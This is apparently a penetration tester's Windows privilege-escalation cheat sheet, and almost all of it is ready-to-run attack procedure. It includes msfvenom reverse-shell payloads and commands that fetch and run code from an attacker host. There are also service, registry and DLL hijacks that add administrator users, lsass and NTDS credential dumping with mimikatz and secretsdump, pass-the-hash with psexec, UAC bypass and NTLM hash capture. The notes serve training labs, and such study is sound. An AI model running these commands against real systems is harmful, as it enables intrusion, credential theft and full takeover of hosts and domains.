- You can do some manual enumeration using Windows CMD
- You can also do automatic enumeration using dedicated tools (see the tools below)
- Windows Kernel Exploits
- See an example of a privesc with a kernel exploit in this writeup
- Enumerate win version / patch level (systeminfo)
- Find matching exploits (Google, ExploitDB, GIthub)
- Compile and run
ATTENTION: Kernel exploits are often unstable and could crash the system
- MS08-067 - vulnerability in the "Server" service
- MS17-010 - EternalBlue - remote code execution vulnerability
- CVE-2021-36934 HiveNightmare - SeriousSam - Windows 10 flaw that results in ANY user having rights to read the Windows registry
icacls c:\Windows\System32\config\SAM
check perm on SAM file- Exploit CVE-2021-36934 with this poc you will get hash and then will be able to get a shell for instance with psexec
psexec.py INLANEFREIGHT/administrator@10.129.43.13 -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54
- Check for spooler service using powershell
ls \\localhost\pipe\spoolss
- Add local admon with PrintNightmare with this Powershell PoC
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "username" -NewPassword "password123!" -DriverName "PrintIt"
- Check if it worked
net user username
- Check installed updates
- Powershell
systeminfo
wmic qfe list brief
Get-Hotfix
- CMD with wmic
wmic qfe list brief
- Powershell
- CVE-2020-0668
- Check out this blog post
- Use this exploit
- Download it
- Open it with visual studio
- Build it
- Check for a third party serv that can be leverage. Check perm on a binary
icacls "c:\path\to\leverage-bin.exe"
- Generate a malicious file
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=ATTACK-IP LPORT=PORT -f exe > leverage-bin.exe
python3 -m http.server 80
serve the binary- Download 2 copy of the binary
wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin.exe
wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin2.exe
- Run the exploit
C:\CVE-2020-0668\CVE-2020-0668.exe C:\Users\user\Desktop\leverage-bin.exe "c:\path\to\leverage-bin.exe"
- Check perm of new file
icacls 'c:\path\to\leverage-bin.exe'
- Replace with malicious binary
copy /Y C:\Users\user\Desktop\leverage-bin2.exe "c:\path\to\leverage-bin.exe"
- Use a Metasploit Resource Script
- Make a file named handler.rc and put this in it
use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST <our_ip> set LPORT 8443 exploit
- Launch metasploit this the resource script
msfconsole -r handler.rc
- Make a file named handler.rc and put this in it
- Start the service
net start leverage-serv
- Even if we get an error we should have a reverse shell in meterpreter
- WinPEAS WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts.
- Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.
- Seatbelt C# project for performing a wide variety of local privilege escalation checks
- SharpUp C# version of PowerUp
- JAWS
Sherlock.ps1 is a powershell script that will give exploit related to the target.
It can also be found here on kali if empire is installed /usr/share/powershell-empire/empire/server/data/module_source/privesc/Sherlock.ps1
- We can launch it with cmd like this (has to be served through an http server from the attacking machine)
echo IEX(New-Object Net.WebClient).DownloadString('http://ATTACK-MACHINE-IP/Sherlock.ps1') | powershell -noprofile -
- Launch from Powershell
Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Absolute\Path\to\Sherlock.ps1
Find-AllVulns
PowerUp is a powershell script for finding common Windows privilege escalation vectors that rely on misconfigurations. It can also be used to exploit some of the issues found.
Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Absolute\Path\to\PowerUp.ps1
Invoke-AllChecks
JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.
Windows Exploit Suggester is a python script that will provide the list of vulnerabilities the OS is vulnerable to using systeminfo
Here is a blog post about wes next generation
- Here is a convenient command in wes to grep specifically for privesc exploit and have an output in color
python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability"
Metasploit Local Exploit Suggester
- SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information.
- LaZagne is a tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more
- Sysinternals Suite is a suite of tools that is used to monitor, manage and troubleshoot the Windows operating system owned by Microsoft. It is really useful for enumeration.
- Security Update Guide
It can be useful to have precompiled binaries just ready to run
Abuse of the research methodology of executable of windows. We will try to place an excutable in a location windows will be looking.
- We will need write permissions in an executable folder
- Check if the binary path is unquoted, we can check a service using
sc qc name-of-service
- Check if we have writing rights with our user we can use accesschk
.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"
we will have a list of user groups with read and write privs - Use msfvenom to generate an executable file
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK-MACHINE-IP LPORT=7777 -f exe > executable_name.exe
- Restart the service
sc start service-name
- Enumerate with automatic tools or this command:
wmic service get name,displayname,pathname,startmode
(it will list the running services) - Check if we can write in the folder of the service
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
- We place the executable in the folder of the program we wish to abuse
- We start the vulnerable service in our example unquotedsvc
sc start unquotedsvc
- we should be added as an administrator we can verify this using
net localgroup administrators
- It is the possibility of running a command as another user
cmdkey /list
- Check the writeup for Access on HTB here to have an example of privesc using runas
- It is when you abuse the fact that a program runs automatically
-
Check what programs have autorun using Windows internals - autorun see example below
-
Check that the program you found that allows FILE_ALL_ACCESS to Everyone using Windows internals - accesschk in our example we would type this in the cmd
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
OR
- With PowerUp:
- In kali
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost Your-Kali-IP-Address
run
- In another cmd tab
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
(give it the same name as the program that has autorun)
- Take the program you created with msfvenom in your target (python HTTP server and then the browser in your target)
- In your target
- Place the program in the directory where the autorun program is
- Wait for the administrator to log in
- You should have a shell in your kali in Metasploit
- If we have admin rights of a registry key in service we could use this to make an executable run with a service (add a user, get a shell, ...)
- We will use this C script
- We will modify the whoami command:
system("whoami > c:\\windows\\temp\\service.txt");
we will add this insteadcmd.exe /k net localgroup administrators user /add
so our script now looks like this:system("cmd.exe /k net localgroup administrators user /add");
- We will compile it
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
- Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)
- In a cmd from our target
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
- Now we just need to start the service
sc start regsvc
net localgroup administrators
we can see that our user is now in the administrators group
- Abusing an executable that we have permissions on
OR
- If we know what program it is we can just do
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
where File Permissions Service is the program we want to abuse
- We will use this C script
- We will modify the whoami command:
system("whoami > c:\\windows\\temp\\service.txt");
we will add this insteadcmd.exe /k net localgroup administrators user /add
so our script now looks like this:system("cmd.exe /k net localgroup administrators user /add");
- We will compile it
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
- Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)
- In the target cmd
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc
- Our user should be in the local administrators group
- We will abuse a program that is launched on startup in which we have rights
- We can enumerate using Windows internals - icacls
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
- The
BUILTIN/Users
group has full acces(F)
to the Startup directory
- In our attack machine
msfconsole
we launch Metasploit use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP-OF-OUR-ATTACK-MACHINE
run
- In another tab
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP-OF-OUR-ATTACK-MACHINE -f exe -o x.exe
- We serve the executable in our target (python http server -> and browse to it from our target)
- We put the file in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" (If you are in the explorer you may have to type ProgramData in the path if it does not appear).
- We wait for an admin to log in
- We should have a shell in metasploit
- DLL is a dynamic Library they often run with executables, when an executable runs the system will look for the dll and if the dll does not exist we could replace it with one of our own.
- We can find it using procmon, we need to add 2 filters "Result is NAME NOT FOUND" and "PATH ends with .dll"
- This will list the dll not found
- We will need write access to the folder where the dll are missing
- We are going to use windows_dll.c
- Edit the file and modify the system command to add our user to the admin goup which would look like this:
system("cmd.exe /k net localgroup administrators user /add");
- We can now compile it
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
- We serve it to our target (python http server -> browser of our target)
- We put it in the path where the system will look for it, in our example it is the temp folder
- We restart the service
sc stop dllsvc & sc start dllsvc
- Our user should be in the admin group now
- PowerUP we should see the service exploitable under the
[*] Checking service permissions
OR
- We can use accesschk
accesschk64.exe -wuvc Everyone *
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
- We should be added to the administrators group
net localgroup administrators
whoami /priv
theSeDebugPrivilege
should be listed
procdump.exe -accepteula -ma lsass.exe lsass.dmp
We will use ProcDump from the SysInternals suite to leverage this privilege and dump the lsass process memory.- We can launch mimikatz from our target
mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
- And now we can take the hashes we need
- If mimikatz does not work and if we have RDP we can dump lsass from the taskmanager (tab "Details" right click on the lsass process and select "Create dump file"
- We can then take the dump to our attack machine et use pypykatz
pypykatz lsa minidump lsass.DMP
- With this privilege, a user could take ownership of any file or object and make changes that could involve access to sensitive data, Remote Code Execution (RCE) or Denial-of-Service (DOS). In this case we need a file to target.
- If necessary enable the privilege using this script
- Take ownership of a flag using takeown `
- Check the change of ownership worked
PS C:\htb> Get-ChildItem -Path 'C:\Path\To\File' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
- Modify the file ACL with icalcs
icacls 'C:\Path\To\File' /grant user:F
- Use the file you have ownership now! :D
- This allows us to copy a file from a folder
- Here is a poc to abuse this
- We can now copy protected files and then use them
Copy-FileSeBackupPrivilege 'c:\path\to\file\file.txt' .\file.txt
- This group will also let us logging in locally to a domain controller.
- NTDS is the active directory database it contains the ntlm hashes of all users and computers in the domain
- We can use diskshadow to make a copy of the drive
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
- Then we just need to copy it with the SeBackupPrivilege
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\paht\to\destination\ntds.dit
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
- We can use secretdumps
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
or the ps module DSInternals
PS C:\user> Import-Module .\DSInternals.psd1
PS C:\user> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\user> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=domain,DC=local' -DBPath .\ntds.dit -BootKey $key
- Note: We can also use robocopy to copy the files
net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
search Security logs (credentials could be dropped this way)Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
Another way to do the same thing- It is also worth to check PowerShell Operational logs
- Using this group privileges, it is possible to use dnscmd to specify the path of a DLL plugin.
Get-ADGroupMember -Identity DnsAdmins
to confirm group membershipmsfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
we generate a dll with msfvenom that will add a user or we can make one that will get us a shell as adminmsfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o shell.dl
- Do not forget to launch a listener if you use the reverse shell
rlwrap nc -lnvp 4444
- Serve the dll using python web server
python3 -m http.server 80
- Download the file in the target
wget "http://Attacking-machine-IP/adduser.dll" -outfile "adduser.dll"
(in powershell) dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
load custom dll (in CMD)
sc stop dns
sc start dns
net group "Domain Admins" /dom
check that we have the priv (or catch the shell)
- CVE-2018-0952
- CVE-2019-0841
- Hyper V admin EOP - decoder it
- Has been mitigated since March 2020
- We need to check for the
SeLoadDriverPrivilege
in a cmd shell launched as adminwhoami /priv
- We download this tool to enable the privilege. We need to add the few lines at the begining of the script
#include <stdio.h>
#include "tchar.h"
- We can then compile it using cl.exe from a visual studio cmd
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
- We then have to download the Capcom.sys driver file
- We can then add the reference to the drive
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
- In powershell we check that the Capcom driver is not loaded with DriverView.exe
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
- Now we need to check it has been enabled
- Finally we can launch the exploit using ExploitCapcom.exe it will launch a shell as authority system
- With this group you will get the
SeBackupPrivilege
andSeRestorePrivilege
sc qc AppReadiness
- We can check permissions with sysinternals PsService
c:\PsService.exe security AppReadiness
- Modify service binary path
sc config AppReadiness binPath= "cmd /c net localgroup Administrators current-user /add"
sc start AppReadiness
Start the service (will fail)- We should be in the Admin group
net localgroup Administrators
- We can now retrieve creds with crackmapexec
crackmapexec smb IP-ADDRESS -u current-user -p 'current password'
- Dump hash and pass
secretsdump.py current-user@IP-ADDRESS -just-dc-user administrator
- We can then get an admin shell using the found hashes
psexec.py INLANEFREIGHT/administrator@IP-ADDRESS -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54
- Checkout the Pentips on uac bypass here
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
confirm UAS is enabledREG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
Checking UAC Level- If
ConsentPromptBehaviorAdmin
is 0x5 it means the highest UAC level ofAlways notify
is enabled [environment]::OSVersion.Version
check win OS version compare with version history here- List of UAC bypass here
msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS-OF_ATTACK_MACHINE LPORT=PORT -f dll > srrstr.dll
generate a malicious dllpython3 -m http.server 80
serve it to the targetcurl http://IP-ATTACK-MACHINE/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"
get it on the targetnc -lvnp CHOSEN-PORT
launch listenerrundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll
run the dll to get the reverse shell back and check if uac is enabled for our current userC:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
execute this to get an elevated shell
- Pentips on abusing ACLs here
.\SharpUp.exe audit
to enumerate- If you detect an executable that you could abuse you can check the permissions with icacls
icacls "C:\Path\to\file.exe"
- Make a back up of the original binary and replace it with a malicious one generated by msfvenom
msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=8888 -f exe > file.exe
(instead of shell name it with the name of the executable that you are abusing - Set up a listener
nc -lnvp 8888
cmd /c copy /Y file.exe "C:\Path\to\file.exe"
copy the exec instead of the original onesc start file
start the service- Get your shell
- If you want to exploit it by adding a user
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators user /add" -f exe > file.exe
.\SharpUp.exe audit
to enumerate- Check permissions on the file you might be able to abuse using win internals AccessChk
accesschk.exe /accepteula -quvcw service
sc config service binpath="cmd /c net localgroup administrators user /add"
change the service binary pathsc stop service
stop the servicesc start service
start the service (it will fail but our exploit will work)net localgroup administrators
check that you user is now admin- To clean up
sc config WindScribeService binpath="C:\Path\to\service.exe"
revert binary pathsc start service
start the servicesc query service
check that service is running
- We can use SharpChrome to retrive cookies and saved logins from Google Chrome
- We can use lazagne to dump passwords from the system
.\lazagne.exe all
- Capture traffic if wireshark is installed
- Process monitoring
while($true) { $process = Get-WmiObject Win32_Process | Select-Object CommandLine Start-Sleep 1 $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine Compare-Object -ReferenceObject $process -DifferenceObject $process2 }
IEX (iwr 'http//IP-OF-ATTACK-MACHINE/procmon.ps1')
execute the script from our target with the code hosted in our attacking machine
- Vulnerable service abuse
- Shell Command File on File Share to capture ntlmv2 pass hash.
- We need an interesting share writable by our user
accesschk -s -w C:\folder-of-shares
- Create a malicious SCF file and name it with an @ at the start for example
@Inventory.scf
[Shell] Command=2 IconFile=\\ATTACK-IP\share\legit.ico [Taskbar] Command=ToggleDesktop
- We then just need to start Responder
sudo responder -wrf -v -I INTERFACE-USED
(your interface can be tun0 for instance it has to be one reachable by the target)
- Finally we can crack the found hash with hashcat
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
- We need an interesting share writable by our user
wmic qfe
will show missing KBs- We can use Sherlock to find the vulnerabilities the target might have.
- On powershell
Set-ExecutionPolicy bypass -Scope process
Import-Module .\Sherlock.ps1
Find-AllVulns
- On powershell
- Get a meterpreter shell
msfconsole
search smb_delivery
you should see this one0 exploit/windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery
use 0
show options
set srvhost and lhost to your attack machine- set the target to DLL (
show targets
set target 0
exploit
- Paste the comand shown on msf in the target
- Receive the shell
- Find a local privesc exploit
- For example we can use CVE 2010-3338
- on metasploit
search 2010-3338
you should see0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation
- Migrate the process
- Backgound the session
background
set session 1
- set lhost to your attacking machine IP
- set lport to a free prot
exploit
- You should get an elevated shell
- Gather
systeminfo
and use windows exploit suggesterpython2.7 windows-exploit-suggester.py --update
this will dl a database file in xls format that you can usepython2.7 windows-exploit-suggester.py --database 2022-04-30-mssb.xls --systeminfo systeminfo
- Example of MS16-032 with this poc
- In Powershell
Set-ExecutionPolicy bypass -scope process
Import-Module .\exploit.ps1
Invoke-MS16-032
- We will get an elevated shell
- In Powershell
{% embed url="https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners" %} TCM Security Academy - Windows Privilege Escalation {% endembed %}
{% embed url="https://tryhackme.com/room/windowsprivescarena" %} Windows privesc arena by TCM on TryHackMe {% endembed %}
{% embed url="https://www.fuzzysecurity.com/tutorials/16.html" %} Windows privesc on Fuzzy Security{% endembed %}
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md" %} Windows privesc on PayloadsAllTheThings{% endembed %}
{% embed url="https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/" %} Windows privesc on Absolomb{% endembed %}
{% embed url="https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html" %} Windows privesc Sushant 747{% endembed %}
{% embed url="https://github.com/TCM-Course-Resources/Windows-Privilege-Escalation-Resources" %} Windows-Privilege-Escalation-Resources - TCM Course Resources - Gr1mmie {% endembed %}
{% embed url="https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation" %} Windows PrivEsc Checklist - Hacktricks {% endembed %}
{% embed url="https://github.com/gtworek/Priv2Admin" %} Priv2Admin {% endembed %}
{% embed url="https://www.leeholmes.com/adjusting-token-privileges-in-powershell/" %} ADJUSTING TOKEN PRIVILEGES IN POWERSHELL - LEE HOLMES {% endembed %}
{% embed url="https://medium.com/@markmotig/enable-all-token-privileges-a7d21b1a4a77" %} Enable All Token Privileges - Mark Mo{% endembed %}
{% embed url="https://adsecurity.org/?p=4064" %} From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS Administration{% endembed %}
{% embed url="https://github.com/hfiref0x/UACME" %} Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor - hfiref0x {% endembed %}